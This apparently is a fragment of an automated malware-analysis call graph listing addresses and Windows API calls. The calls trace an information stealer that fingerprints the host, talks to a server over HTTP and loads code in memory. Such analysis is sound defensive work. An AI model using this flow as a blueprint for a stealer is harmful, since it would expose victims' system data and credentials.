90573->90574 90575 40ff60 lstrcpy 90574->90575 90576 405fe0 90575->90576 90577 410040 3 API calls 90576->90577 90578 405ffd 90577->90578 90579 40ff60 lstrcpy 90578->90579 90580 40600a 90579->90580 90581 410040 3 API calls 90580->90581 90582 406028 90581->90582 90583 40ff60 lstrcpy 90582->90583 90584 406035 90583->90584 90585 410040 3 API calls 90584->90585 90586 406051 90585->90586 90587 40ff60 lstrcpy 90586->90587 90588 40605e 90587->90588 90589 40ffb0 2 API calls 90588->90589 90590 406079 90589->90590 90591 40ff60 lstrcpy 90590->90591 90592 406086 90591->90592 90593 410040 3 API calls 90592->90593 90594 4060a2 90593->90594 90595 40ff60 lstrcpy 90594->90595 90596 4060af 90595->90596 90597 410040 3 API calls 90596->90597 90598 4060cb 90597->90598 90599 40ff60 lstrcpy 90598->90599 90600 4060d8 90599->90600 90601 40ffb0 2 API calls 90600->90601 90602 4060f3 90601->90602 90603 40ff60 lstrcpy 90602->90603 90604 406100 90603->90604 90605 410040 3 API calls 90604->90605 90606 40611c 90605->90606 90607 40ff60 lstrcpy 90606->90607 90608 406129 90607->90608 90609 410040 3 API calls 90608->90609 90610 406146 90609->90610 90611 40ff60 lstrcpy 90610->90611 90612 406153 90611->90612 90613 410040 3 API calls 90612->90613 90614 40616f 90613->90614 90615 40ff60 lstrcpy 90614->90615 90616 40617c 90615->90616 90617 410040 3 API calls 90616->90617 90618 406198 90617->90618 90619 40ff60 lstrcpy 90618->90619 90620 4061a5 90619->90620 90621 4023c0 lstrcpy 90620->90621 90622 4061b9 90621->90622 90623 40ffb0 2 API calls 90622->90623 90624 4061cd 90623->90624 90625 40ff60 lstrcpy 90624->90625 90626 4061da 90625->90626 90627 410040 3 API calls 90626->90627 90628 406202 90627->90628 90629 40ff60 lstrcpy 90628->90629 90630 40620f 90629->90630 90631 410040 3 API calls 90630->90631 90632 40622b 90631->90632 90633 40ff60 lstrcpy 90632->90633 90634 406238 90633->90634 90635 40ffb0 2 API calls 90634->90635 90636 406253 90635->90636 90637 40ff60 lstrcpy 90636->90637 90638 406260 90637->90638 90639 410040 3 API calls 90638->90639 90640 40627c 90639->90640 90641 40ff60 lstrcpy 90640->90641 90642 406289 90641->90642 90643 410040 3 API calls 90642->90643 90644 4062a7 90643->90644 90645 40ff60 lstrcpy 90644->90645 90646 4062b4 90645->90646 90647 410040 3 API calls 90646->90647 90648 4062d0 90647->90648 90649 40ff60 lstrcpy 90648->90649 90650 4062dd 90649->90650 90651 410040 3 API calls 90650->90651 90652 4062f9 90651->90652 90653 40ff60 lstrcpy 90652->90653 90654 406306 90653->90654 90655 40ffb0 2 API calls 90654->90655 90656 406321 90655->90656 90657 40ff60 lstrcpy 90656->90657 90658 40632e 90657->90658 90659 406341 lstrlen 90658->90659 91311 410120 90659->91311 90661 406352 lstrlen GetProcessHeap HeapAlloc 91312 410120 90661->91312 90663 406375 lstrlen 91313 410120 90663->91313 90665 406385 memcpy 91314 410120 90665->91314 90667 406397 lstrlen 90668 4063a7 90667->90668 90669 4063b0 lstrlen memcpy 90668->90669 91315 410120 90669->91315 90671 4063cc lstrlen 91316 410120 90671->91316 90673 4063dc HttpSendRequestA InternetReadFile 90674 406458 InternetCloseHandle 90673->90674 90676 406402 90673->90676 90674->90561 90675 410040 3 API calls 90675->90676 90676->90674 90676->90675 90677 40ff60 lstrcpy 90676->90677 90678 40643d InternetReadFile 90676->90678 90677->90676 90678->90674 90678->90676 91322 410120 90679->91322 90681 41225f strtok_s 90682 4122c9 90681->90682 90684 41226c 90681->90684 90682->89456 90683 4122b2 strtok_s 90683->90682 90683->90684 90684->90683 90685 40ff10 2 API calls 90684->90685 90686 40ff10 2 API calls 90684->90686 90685->90683 90686->90684 91323 410120 90687->91323 90689 4120af strtok_s 90691 4121dd 90689->90691 90696 4120c0 90689->90696 90690 4121c2 strtok_s 90690->90691 90690->90696 90691->89464 90692 412194 StrCmpCA 90692->90696 90693 4120f6 StrCmpCA 90693->90696 90694 412168 StrCmpCA 90694->90696 90695 41213c StrCmpCA 90695->90696 90696->90690 90696->90692 90696->90693 90696->90694 90696->90695 90697 40ff10 lstrlen lstrcpy 90696->90697 90697->90696 90699 40fe80 lstrcpy 90698->90699 90700 415923 90699->90700 90701 410040 3 API calls 90700->90701 90702 415939 90701->90702 90703 40ff60 lstrcpy 90702->90703 90704 415946 90703->90704 91324 402390 90704->91324 90707 40ffb0 2 API calls 90708 41596e 90707->90708 90709 40ff60 lstrcpy 90708->90709 90710 41597b 90709->90710 90711 410040 3 API calls 90710->90711 90712 4159a3 90711->90712 90713 40ff60 lstrcpy 90712->90713 90714 4159b0 90713->90714 90715 410040 3 API calls 90714->90715 90716 4159cc 90715->90716 90717 40ff60 lstrcpy 90716->90717 90718 4159d9 90717->90718 90719 410040 3 API calls 90718->90719 90720 4159f5 90719->90720 90721 40ff60 lstrcpy 90720->90721 90722 415a02 90721->90722 91327 410300 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 90722->91327 90724 415a12 90725 410040 3 API calls 90724->90725 90726 415a1f 90725->90726 90727 40ff60 lstrcpy 90726->90727 90728 415a2c 90727->90728 90729 410040 3 API calls 90728->90729 90730 415a48 90729->90730 90731 40ff60 lstrcpy 90730->90731 90732 415a55 90731->90732 90733 410040 3 API calls 90732->90733 90734 415a71 90733->90734 90735 40ff60 lstrcpy 90734->90735 90736 415a7e 90735->90736 91328 410c90 memset RegOpenKeyExA 90736->91328 90738 415a8e 90739 410040 3 API calls 90738->90739 90740 415a9b 90739->90740 90741 40ff60 lstrcpy 90740->90741 90742 415aa8 90741->90742 90743 410040 3 API calls 90742->90743 90744 415ac4 90743->90744 90745 40ff60 lstrcpy 90744->90745 90746 415ad1 90745->90746 90747 410040 3 API calls 90746->90747 90748 415aed 90747->90748 90749 40ff60 lstrcpy 90748->90749 90750 415afa 90749->90750 90751 410d30 2 API calls 90750->90751 90752 415b0e 90751->90752 90753 40ffb0 2 API calls 90752->90753 90754 415b22 90753->90754 90755 40ff60 lstrcpy 90754->90755 90756 415b2f 90755->90756 90757 410040 3 API calls 90756->90757 90758 415b57 90757->90758 90759 40ff60 lstrcpy 90758->90759 90760 415b64 90759->90760 90761 410040 3 API calls 90760->90761 90762 415b80 90761->90762 90763 40ff60 lstrcpy 90762->90763 90764 415b8d 90763->90764 90765 410d90 12 API calls 90764->90765 90766 415ba1 90765->90766 90767 40ffb0 2 API calls 90766->90767 90768 415bb5 90767->90768 90769 40ff60 lstrcpy 90768->90769 90770 415bc2 90769->90770 90771 410040 3 API calls 90770->90771 90772 415bea 90771->90772 90773 40ff60 lstrcpy 90772->90773 90774 415bf7 90773->90774 90775 410040 3 API calls 90774->90775 90776 415c13 90775->90776 90777 40ff60 lstrcpy 90776->90777 90778 415c20 90777->90778 90779 415c2b GetCurrentProcessId 90778->90779 91332 411a40 OpenProcess 90779->91332 90782 40ffb0 2 API calls 90783 415c4f 90782->90783 90784 40ff60 lstrcpy 90783->90784 90785 415c5c 90784->90785 90786 410040 3 API calls 90785->90786 90787 415c84 90786->90787 90788 40ff60 lstrcpy 90787->90788 90789 415c91 90788->90789 90790 410040 3 API calls 90789->90790 90791 415cad 90790->90791 90792 40ff60 lstrcpy 90791->90792 90793 415cba 90792->90793 90794 410040 3 API calls 90793->90794 90795 415cd6 90794->90795 90796 40ff60 lstrcpy 90795->90796 90797 415ce3 90796->90797 90798 410040 3 API calls 90797->90798 90799 415cff 90798->90799 90800 40ff60 lstrcpy 90799->90800 90801 415d0c 90800->90801 91337 410f40 GetProcessHeap HeapAlloc 90801->91337 90803 415d1c 90804 410040 3 API calls 90803->90804 90805 415d29 90804->90805 90806 40ff60 lstrcpy 90805->90806 90807 415d36 90806->90807 90808 410040 3 API calls 90807->90808 90809 415d52 90808->90809 90810 40ff60 lstrcpy 90809->90810 90811 415d5f 90810->90811 90812 410040 3 API calls 90811->90812 90813 415d7b 90812->90813 90814 40ff60 lstrcpy 90813->90814 90815 415d88 90814->90815 91344 4110a0 CoInitializeEx CoInitializeSecurity CoCreateInstance 90815->91344 90817 415d9c 90818 40ffb0 2 API calls 90817->90818 90819 415db0 90818->90819 90820 40ff60 lstrcpy 90819->90820 90821 415dbd 90820->90821 90822 410040 3 API calls 90821->90822 90823 415de5 90822->90823 90824 40ff60 lstrcpy 90823->90824 90825 415df2 90824->90825 90826 410040 3 API calls 90825->90826 90827 415e0e 90826->90827 90828 40ff60 lstrcpy 90827->90828 90829 415e1b 90828->90829 91358 411260 CoInitializeEx CoInitializeSecurity CoCreateInstance 90829->91358 90831 415e2f 90832 40ffb0 2 API calls 90831->90832 90833 415e43 90832->90833 90834 40ff60 lstrcpy 90833->90834 90835 415e50 90834->90835 90836 410040 3 API calls 90835->90836 90837 415e78 90836->90837 90838 40ff60 lstrcpy 90837->90838 90839 415e85 90838->90839 90840 410040 3 API calls 90839->90840 90841 415ea1 90840->90841 90842 40ff60 lstrcpy 90841->90842 90843 415eae 90842->90843 90844 4102c0 3 API calls 90843->90844 90845 415ebe 90844->90845 90846 410040 3 API calls 90845->90846 90847 415ecb 90846->90847 90848 40ff60 lstrcpy 90847->90848 90849 415ed8 90848->90849 90850 410040 3 API calls 90849->90850 90851 415ef4 90850->90851 90852 40ff60 lstrcpy 90851->90852 90853 415f01 90852->90853 90854 410040 3 API calls 90853->90854 90855 415f1d 90854->90855 90856 40ff60 lstrcpy 90855->90856 90857 415f2a 90856->90857 91372 410280 GetProcessHeap HeapAlloc GetUserNameA 90857->91372 90859 415f3a 90860 410040 3 API calls 90859->90860 90861 415f47 90860->90861 90862 40ff60 lstrcpy 90861->90862 90863 415f54 90862->90863 90864 410040 3 API calls 90863->90864 90865 415f70 90864->90865 90866 40ff60 lstrcpy 90865->90866 90867 415f7d 90866->90867 90868 410040 3 API calls 90867->90868 90869 415f99 90868->90869 90870 40ff60 lstrcpy 90869->90870 90871 415fa6 90870->90871 91373 410c10 7 API calls 90871->91373 90874 40ffb0 2 API calls 90875 415fce 90874->90875 90876 40ff60 lstrcpy 90875->90876 90877 415fdb 90876->90877 90878 410040 3 API calls 90877->90878 90879 416003 90878->90879 90880 40ff60 lstrcpy 90879->90880 90881 416010 90880->90881 90882 410040 3 API calls 90881->90882 90883 41602c 90882->90883 90884 40ff60 lstrcpy 90883->90884 90885 416039 90884->90885 91376 4103d0 90885->91376 90888 40ffb0 2 API calls 90889 416064 90888->90889 90890 40ff60 lstrcpy 90889->90890 90891 416071 90890->90891 90892 410040 3 API calls 90891->90892 90893 41609f 90892->90893 90894 40ff60 lstrcpy 90893->90894 90895 4160ac 90894->90895 90896 410040 3 API calls 90895->90896 90897 4160cb 90896->90897 90898 40ff60 lstrcpy 90897->90898 90899 4160d8 90898->90899 91386 410300 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 90899->91386 90901 4160e8 90902 410040 3 API calls 90901->90902 90903 4160f5 90902->90903 90904 40ff60 lstrcpy 90903->90904 90905 416102 90904->90905 90906 410040 3 API calls 90905->90906 90907 416121 90906->90907 90908 40ff60 lstrcpy 90907->90908 90909 41612e 90908->90909 90910 410040 3 API calls 90909->90910 90911 416150 90910->90911 90912 40ff60 lstrcpy 90911->90912 90913 41615d 90912->90913 91387 410360 GetProcessHeap HeapAlloc GetTimeZoneInformation 90913->91387 90916 410040 3 API calls 90917 416180 90916->90917 90918 40ff60 lstrcpy 90917->90918 90919 41618d 90918->90919 90920 410040 3 API calls 90919->90920 90921 4161af 90920->90921 90922 40ff60 lstrcpy 90921->90922 90923 4161bc 90922->90923 90924 410040 3 API calls 90923->90924 90925 4161de 90924->90925 90926 40ff60 lstrcpy 90925->90926 90927 4161eb 90926->90927 90928 410040 3 API calls 90927->90928 90929 41620d 90928->90929 90930 40ff60 lstrcpy 90929->90930 90931 41621a 90930->90931 91390 410530 GetProcessHeap HeapAlloc RegOpenKeyExA 90931->91390 90934 410040 3 API calls 90935 41623d 90934->90935 90936 40ff60 lstrcpy 90935->90936 90937 41624a 90936->90937 90938 410040 3 API calls 90937->90938 90939 41626c 90938->90939 90940 40ff60 lstrcpy 90939->90940 90941 416279 90940->90941 90942 410040 3 API calls 90941->90942 90943 416298 90942->90943 90944 40ff60 lstrcpy 90943->90944 90945 4162a5 90944->90945 91393 4105e0 GetLogicalProcessorInformationEx 90945->91393 90947 4162b5 90948 410040 3 API calls 90947->90948 90949 4162c2 90948->90949 90950 40ff60 lstrcpy 90949->90950 90951 4162cf 90950->90951 90952 410040 3 API calls 90951->90952 90953 4162ee 90952->90953 90954 40ff60 lstrcpy 90953->90954 90955 4162fb 90954->90955 90956 410040 3 API calls 90955->90956 90957 41631a 90956->90957 90958 40ff60 lstrcpy 90957->90958 90959 416327 90958->90959 91409 4105a0 GetSystemInfo wsprintfA 90959->91409 90961 416337 90962 410040 3 API calls 90961->90962 90963 416344 90962->90963 90964 40ff60 lstrcpy 90963->90964 90965 416351 90964->90965 90966 410040 3 API calls 90965->90966 90967 416370 90966->90967 90968 40ff60 lstrcpy 90967->90968 90969 41637d 90968->90969 90970 410040 3 API calls 90969->90970 90971 41639c 90970->90971 90972 40ff60 lstrcpy 90971->90972 90973 4163a9 90972->90973 91410 4106e0 GetProcessHeap HeapAlloc 90973->91410 90975 4163b9 90976 410040 3 API calls 90975->90976 90977 4163c6 90976->90977 90978 40ff60 lstrcpy 90977->90978 90979 4163d3 90978->90979 90980 410040 3 API calls 90979->90980 90981 4163f2 90980->90981 90982 40ff60 lstrcpy 90981->90982 90983 4163ff 90982->90983 90984 410040 3 API calls 90983->90984 90985 416421 90984->90985 90986 40ff60 lstrcpy 90985->90986 90987 41642e 90986->90987 90988 410040 3 API calls 90987->90988 90989 416450 90988->90989 90990 40ff60 lstrcpy 90989->90990 90991 41645d 90990->90991 91415 410750 90991->91415 90994 40ffb0 2 API calls 90995 41648e 90994->90995 90996 40ff60 lstrcpy 90995->90996 90997 41649b 90996->90997 90998 410040 3 API calls 90997->90998 90999 4164cc 90998->90999 91000 40ff60 lstrcpy 90999->91000 91001 4164d9 91000->91001 91002 410040 3 API calls 91001->91002 91003 4164fb 91002->91003 91004 40ff60 lstrcpy 91003->91004 91005 416508 91004->91005 91423 410b00 91005->91423 91007 416522 91008 40ffb0 2 API calls 91007->91008 91009 416539 91008->91009 91010 40ff60 lstrcpy 91009->91010 91011 416546 91010->91011 91012 410040 3 API calls 91011->91012 91013 416577 91012->91013 91014 40ff60 lstrcpy 91013->91014 91015 416584 91014->91015 91016 410040 3 API calls 91015->91016 91017 4165a6 91016->91017 91018 40ff60 lstrcpy 91017->91018 91019 4165b3 91018->91019 91432 410860 91019->91432 91021 4165d2 91022 40ffb0 2 API calls 91021->91022 91023 4165e9 91022->91023 91024 40ff60 lstrcpy 91023->91024 91025 4165f6 91024->91025 91026 410860 13 API calls 91025->91026 91027 416624 91026->91027 91028 40ffb0 2 API calls 91027->91028 91029 41663b 91028->91029 91030 40ff60 lstrcpy 91029->91030 91031 416648 91030->91031 91032 410040 3 API calls 91031->91032 91033 416676 91032->91033 91034 40ff60 lstrcpy 91033->91034 91035 416683 91034->91035 91036 416696 lstrlen 91035->91036 91037 4166a6 91036->91037 91038 40fe80 lstrcpy 91037->91038 91039 4166bc 91038->91039 91040 401130 lstrcpy 91039->91040 91041 4166d4 91040->91041 91449 415650 91041->91449 91043 4166e0 91043->89468 91045 40fec0 lstrcpy 91044->91045 91046 404bc9 91045->91046 91047 4043c0 5 API calls 91046->91047 91048 404bd5 GetProcessHeap RtlAllocateHeap 91047->91048 91712 410120 91048->91712 91050 404c0f InternetOpenA StrCmpCA 91051 404c30 91050->91051 91052 404d98 InternetCloseHandle 91051->91052 91053 404c3e InternetConnectA 91051->91053 91060 404dab 91052->91060 91054 404c64 HttpOpenRequestA 91053->91054 91055 404d8e InternetCloseHandle 91053->91055 91056 404d84 InternetCloseHandle 91054->91056 91057 404c9c 91054->91057 91055->91052 91056->91055 91058 404ca0 InternetSetOptionA 91057->91058 91059 404cb9 HttpSendRequestA HttpQueryInfoA 91057->91059 91058->91059 91061 404cee 91059->91061 91064 404d21 91059->91064 91060->89474 91061->89474 91062 404d81 91062->91056 91063 404d40 InternetReadFile 91063->91062 91063->91064 91064->91061 91064->91062 91064->91063 91713 406d60 91065->91713 91067 40edd1 91068 401130 lstrcpy 91067->91068 91069 40ede4 91068->91069 91933 40c550 8 API calls 91069->91933 91070 40ebaf StrCmpCA 91094 40eb80 91070->91094 91072 40ede9 91073 401130 lstrcpy 91072->91073 91074 40edf7 91073->91074 91959 40c9f0 91074->91959 91075 40ec39 StrCmpCA 91075->91094 91077 40fe80 lstrcpy 91077->91094 91078 40ed69 StrCmpCA 91078->91094 91079 401130 lstrcpy 91079->91094 91081 40ffb0 2 API calls 91081->91094 91083 410040 lstrlen lstrcpy lstrcat 91083->91094 91087 40ff60 lstrcpy 91087->91094 91094->91067 91094->91070 91094->91075 91094->91077 91094->91078 91094->91079 91094->91081 91094->91083 91094->91087 91096 40fec0 lstrcpy 91094->91096 91717 40e1d0 91094->91717 91769 40e510 91094->91769 91882 40bca0 91094->91882 91096->91094 91271 40fe80 lstrcpy 91270->91271 91272 40243b 91271->91272 91272->90310 91273->90310 91274->90310 91275->90310 91276->90310 91277->90278 91278->90297 91279->90254 91280->90277 91281->90233 91282->90256 91283->90218 91284->90234 91286 40fe80 lstrcpy 91285->91286 91287 40246b 91286->91287 91287->90209 91288->90219 91290 410d52 91289->91290 91291 410d64 91289->91291 91292 40fe80 lstrcpy 91290->91292 91293 40fe80 lstrcpy 91291->91293 91294 410d5d 91292->91294 91295 410d70 91293->91295 91294->90333 91295->90333 91296->90337 91298 4043f0 91297->91298 91298->91298 91299 4043f7 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 91298->91299 91308 410120 91299->91308 91301 404445 lstrlen 91309 410120 91301->91309 91303 404455 InternetCrackUrlA 91304 40447a 91303->91304 91304->90346 91305->90471 91307 40ff08 91306->91307 91307->90396 91308->91301 91309->91303 91310->90481 91311->90661 91312->90663 91313->90665 91314->90667 91315->90671 91316->90673 91318 406f41 LocalAlloc 91317->91318 91319 406f7b 91317->91319 91318->91319 91320 406f52 CryptStringToBinaryA 91318->91320 91319->90523 91320->91319 91321 406f69 LocalFree 91320->91321 91321->90523 91322->90681 91323->90689 91325 40fe80 lstrcpy 91324->91325 91326 4023ab 91325->91326 91326->90707 91327->90724 91329 410cfa CharToOemA 91328->91329 91330 410cdc RegQueryValueExA 91328->91330 91329->90738 91330->91329 91333 411a84 91332->91333 91334 411a68 K32GetModuleFileNameExA CloseHandle 91332->91334 91335 40fe80 lstrcpy 91333->91335 91334->91333 91336 411a95 91335->91336 91336->90782 91463 410200 GetProcessHeap HeapAlloc RegOpenKeyExA 91337->91463 91339 410f69 91340 410f70 91339->91340 91341 410f7a RegOpenKeyExA 91339->91341 91340->90803 91342 410fb2 91341->91342 91343 410f9b RegQueryValueExA 91341->91343 91342->90803 91343->91342 91345 411111 91344->91345 91346 411119 CoSetProxyBlanket 91345->91346 91349 41122e 91345->91349 91348 41114c 91346->91348 91347 40fe80 lstrcpy 91350 411244 91347->91350 91348->91349 91351 411154 91348->91351 91349->91347 91350->90817 91351->91350 91352 411182 VariantInit 91351->91352 91353 4111a6 91352->91353 91466 410ff0 CoCreateInstance 91353->91466 91355 4111b5 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 91356 40fe80 lstrcpy 91355->91356 91357 411213 VariantClear 91356->91357 91357->90817 91359 4112d1 91358->91359 91360 4112d9 CoSetProxyBlanket 91359->91360 91361 411394 91359->91361 91363 41130c 91360->91363 91362 40fe80 lstrcpy 91361->91362 91365 4113aa 91362->91365 91363->91361 91364 411314 91363->91364 91364->91365 91366 41133e VariantInit 91364->91366 91365->90831 91367 411362 91366->91367 91472 411670 LocalAlloc CharToOemW 91367->91472 91369 41136b 91370 40fe80 lstrcpy 91369->91370 91371 411379 VariantClear 91370->91371 91371->90831 91372->90859 91374 40fe80 lstrcpy 91373->91374 91375 410c83 91374->91375 91375->90874 91377 40fe80 lstrcpy 91376->91377 91378 410408 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 91377->91378 91379 410502 91378->91379 91385 410447 91378->91385 91380 410510 91379->91380 91381 410509 LocalFree 91379->91381 91380->90888 91381->91380 91382 410450 GetLocaleInfoA 91382->91385 91383 410040 lstrlen lstrcpy lstrcat 91383->91385 91384 40ff60 lstrcpy 91384->91385 91385->91379 91385->91382 91385->91383 91385->91384 91386->90901 91388 410392 wsprintfA 91387->91388 91389 4103bb 91387->91389 91388->91389 91389->90916 91391 410575 RegQueryValueExA 91390->91391 91392 41058c 91390->91392 91391->91392 91392->90934 91394 41060c 91393->91394 91398 410652 91393->91398 91395 410610 GetLastError 91394->91395 91406 410623 91394->91406 91395->91394 91397 4106b4 91395->91397 91400 4106be 91397->91400 91476 411470 GetProcessHeap HeapFree 91397->91476 91475 411470 GetProcessHeap HeapFree 91398->91475 91399 41067b 91401 410685 wsprintfA 91399->91401 91402 4106cd 91399->91402 91400->90947 91401->90947 91402->90947 91407 4106a8 91406->91407 91408 41063e GetLogicalProcessorInformationEx 91406->91408 91473 411470 GetProcessHeap HeapFree 91406->91473 91474 411490 GetProcessHeap HeapAlloc 91406->91474 91407->90947 91408->91395 91408->91398 91409->90961 91477 411420 91410->91477 91413 410720 wsprintfA 91413->90975 91416 40fe80 lstrcpy 91415->91416 91417 410788 EnumDisplayDevicesA 91416->91417 91418 410842 91417->91418 91419 4107b5 91417->91419 91418->90994 91420 410040 lstrlen lstrcpy lstrcat 91419->91420 91421 40ff60 lstrcpy 91419->91421 91422 41081d EnumDisplayDevicesA 91419->91422 91420->91419 91421->91419 91422->91418 91422->91419 91424 40fe80 lstrcpy 91423->91424 91425 410b38 CreateToolhelp32Snapshot Process32First 91424->91425 91426 410b69 Process32Next 91425->91426 91427 410be8 CloseHandle 91425->91427 91426->91427 91430 410b7b 91426->91430 91427->91007 91428 410040 lstrlen lstrcpy lstrcat 91428->91430 91429 40ff60 lstrcpy 91429->91430 91430->91428 91430->91429 91431 410bd6 Process32Next 91430->91431 91431->91427 91431->91430 91433 40fe80 lstrcpy 91432->91433 91434 410892 RegOpenKeyExA 91433->91434 91435 4108c9 91434->91435 91436 4108f8 91434->91436 91437 40fec0 lstrcpy 91435->91437 91438 410900 RegEnumKeyExA 91436->91438 91443 410aa1 91436->91443 91446 410040 lstrlen lstrcpy lstrcat 91436->91446 91447 410a0c RegQueryValueExA 91436->91447 91448 40ff60 lstrcpy 91436->91448 91439 4108d7 91437->91439 91438->91436 91440 41092e wsprintfA RegOpenKeyExA 91438->91440 91439->91021 91441 410973 RegQueryValueExA 91440->91441 91440->91443 91441->91436 91442 4109a3 lstrlen 91441->91442 91442->91436 91444 40fec0 lstrcpy 91443->91444 91445 410ab9 91444->91445 91445->91021 91446->91436 91447->91436 91448->91436 91450 415682 91449->91450 91451 40ff60 lstrcpy 91450->91451 91452 4156cd 91451->91452 91453 40ff60 lstrcpy 91452->91453 91454 4156f1 91453->91454 91455 40ff60 lstrcpy 91454->91455 91456 4156fd 91455->91456 91457 40ff60 lstrcpy 91456->91457 91458 415709 91457->91458 91459 415711 Sleep 91458->91459 91460 415724 CreateThread WaitForSingleObject 91458->91460 91459->91459 91459->91460 91461 40fe80 lstrcpy 91460->91461 91479 4140d0 91460->91479 91462 415758 91461->91462 91462->91043 91464 410245 RegQueryValueExA 91463->91464 91465 41025b 91463->91465 91464->91465 91465->91339 91467 411017 SysAllocString 91466->91467 91468 41107e 91466->91468 91467->91468 91470 411028 91467->91470 91468->91355 91469 41107a SysFreeString 91469->91468 91470->91469 91471 41105e _wtoi64 SysFreeString 91470->91471 91471->91469 91472->91369 91473->91406 91474->91406 91475->91399 91476->91400 91478 41070a GlobalMemoryStatusEx 91477->91478 91478->91413 91488 410120 91479->91488 91481 4140ff lstrlen 91482 41410f 91481->91482 91484 41411a 91481->91484 91483 40fec0 lstrcpy 91483->91484 91484->91483 91486 40ff60 lstrcpy 91484->91486 91487 4141c9 StrCmpCA 91484->91487 91489 404dd0 91484->91489 91486->91484 91487->91482 91487->91484 91488->91481 91490 40fec0 lstrcpy 91489->91490 91491 404e0e 91490->91491 91492 4043c0 5 API calls 91491->91492 91493 404e1a 91492->91493 91698 4117a0 91493->91698 91495 404e4a 91496 404e55 lstrlen 91495->91496 91497 404e65 91496->91497 91498 4117a0 4 API calls 91497->91498 91499 404e73 91498->91499 91500 40fe80 lstrcpy 91499->91500 91501 404e83 91500->91501 91502 40fe80 lstrcpy 91501->91502 91503 404e94 91502->91503 91504 40fe80 lstrcpy 91503->91504 91505 404ea5 91504->91505 91506 40fe80 lstrcpy 91505->91506 91507 404eb6 91506->91507 91508 40fe80 lstrcpy 91507->91508 91509 404ec7 StrCmpCA 91508->91509 91510 404eeb 91509->91510 91511 404f17 91510->91511 91514 404f06 InternetOpenA 91510->91514 91512 4114d0 2 API calls 91511->91512 91513 404f22 91512->91513 91515 40ffb0 2 API calls 91513->91515 91514->91511 91523 405765 91514->91523 91516 404f39 91515->91516 91517 40ff60 lstrcpy 91516->91517 91518 404f46 91517->91518 91519 410040 3 API calls 91518->91519 91520 404f71 91519->91520 91521 40ffb0 2 API calls 91520->91521 91522 404f87 91521->91522 91524 410040 3 API calls 91522->91524 91526 40fec0 lstrcpy 91523->91526 91525 404f9b 91524->91525 91527 40ff60 lstrcpy 91525->91527 91536 4056a4 91526->91536 91536->91484 91699 4117b3 CryptBinaryToStringA 91698->91699 91700 4117ac 91698->91700 91701 4117e9 91699->91701 91702 4117ce GetProcessHeap RtlAllocateHeap 91699->91702 91700->91495 91701->91495 91702->91701 91703 4117f1 CryptBinaryToStringA 91702->91703 91703->91495 91712->91050 91714 406d6c 91713->91714 92034 406c30 91714->92034 91716 406d7f 91716->91094 91718 40fe80 lstrcpy 91717->91718 91719 40e201 91718->91719 92087 4116f0 SHGetFolderPathA 91719->92087 91722 40ffb0 2 API calls 91723 40e22d 91722->91723 91724 40ff60 lstrcpy 91723->91724 91725 40e23a 91724->91725 91726 40ffb0 2 API calls 91725->91726 91770 40fe80 lstrcpy 91769->91770 91771 40e541 91770->91771 91772 40fe80 lstrcpy 91771->91772 91773 40e552 91772->91773 91774 40e56c StrCmpCA 91773->91774 91775 40e826 91774->91775 91776 40e57d 91774->91776 91778 4116f0 2 API calls 91775->91778 91777 4116f0 2 API calls 91776->91777 91780 40e586 91777->91780 91779 40e82f 91778->91779 91781 40ffb0 2 API calls 91779->91781 91782 40ffb0 2 API calls 91780->91782 91784 40e843 91781->91784 91783 40e59a 91782->91783 91883 40fe80 lstrcpy 91882->91883 91884 40bcd0 91883->91884 91885 40fe80 lstrcpy 91884->91885 91886 40bce1 91885->91886 91887 4116f0 2 API calls 91886->91887 91888 40bcf1 91887->91888 91889 40ffb0 2 API calls 91888->91889 91890 40bd05 91889->91890 91891 40ff60 lstrcpy 91890->91891 91934 40c67f RegGetValueA 91933->91934 91946 40c638 91933->91946 91936 40c6a7 RegOpenKeyExA 91934->91936 91937 40c704 RegEnumKeyExA 91936->91937 91940 40c6e0 91936->91940 91938 40c726 GetProcessHeap HeapAlloc 91937->91938 91943 40c9b3 91937->91943 91939 40c743 lstrcat lstrcat RegGetValueA lstrcat RegGetValueA 91938->91939 91941 40c7f0 lstrcat 91939->91941 91952 40c740 91939->91952 91940->91946 91942 40c7ff 8 API calls 91941->91942 91945 40c8e4 lstrcat lstrcat RegEnumKeyExA memset memset 91942->91945 91942->91952 91943->91072 91945->91952 91946->91072 91949 40c7d8 lstrcat 91949->91952 91952->91939 91952->91942 91952->91945 91952->91949 91954 40c8ce lstrcat 91952->91954 91954->91952 91960 40fe80 lstrcpy 91959->91960 92037 406aa0 92034->92037 92036 406c58 92036->91716 92038 406ab3 92037->92038 92039 406abb 92037->92039 92038->92036 92054 406560 92039->92054 92041 406adb 92050 406b63 92041->92050 92060 406630 92041->92060 92043 406aee 92043->92050 92067 406850 92043->92067 92045 406b29 92045->92050 92077 4069e0 92045->92077 92047 406b36 92047->92050 92050->92036 92055 40656c 92054->92055 92056 406573 92055->92056 92057 4065cd 92055->92057 92056->92041 92084 411490 GetProcessHeap HeapAlloc 92057->92084 92059 4065e2 92059->92041 92061 40667f VirtualAlloc 92060->92061 92066 40664f 92060->92066 92062 4066d7 92061->92062 92063 4066a8 92061->92063 92062->92043 92064 4066b9 VirtualAlloc 92063->92064 92065 4066ae 92063->92065 92064->92062 92065->92043 92066->92061 92068 40686b 92067->92068 92069 40688c 92067->92069 92068->92069 92070 406895 LoadLibraryA 92068->92070 92069->92045 92071 4069c1 92070->92071 92076 406892 92070->92076 92071->92045 92073 406976 GetProcAddress 92073->92071 92073->92076 92074 4069a5 92074->92045 92076->92070 92076->92073 92076->92074 92085 411490 GetProcessHeap HeapAlloc 92076->92085 92086 411470 GetProcessHeap HeapFree 92076->92086 92078 406a6b 92077->92078 92079 4069f6 92077->92079 92078->92047 92079->92078 92080 406a3f VirtualProtect 92079->92080 92080->92079 92084->92059 92085->92076 92086->92076 92088 40fe80 lstrcpy 92087->92088 92089 40e218 92088->92089 92089->91722 92878 19c432e7 92881 19e1f01a 92878->92881 92879 19e1f06d RtlReAllocateHeap 92880 19e1f027 92879->92880 92879->92881 92881->92879 92881->92880 92882 19c4fd40 92884 19c4fd67 92882->92884 92883 19c4fdf4 ReadFile 92883->92884 92885 19c4fd83 92883->92885 92884->92883 92884->92885 92886 19c57d30 92887 19c57d43 92886->92887 92889 19c57d49 92886->92889 92890 19dd8d80 92887->92890 92891 19dd8d8f __vsnprintf 92890->92891 92893 19dd8e6f 92891->92893 92894 19c54cf0 92891->92894 92893->92889 92896 19c54d30 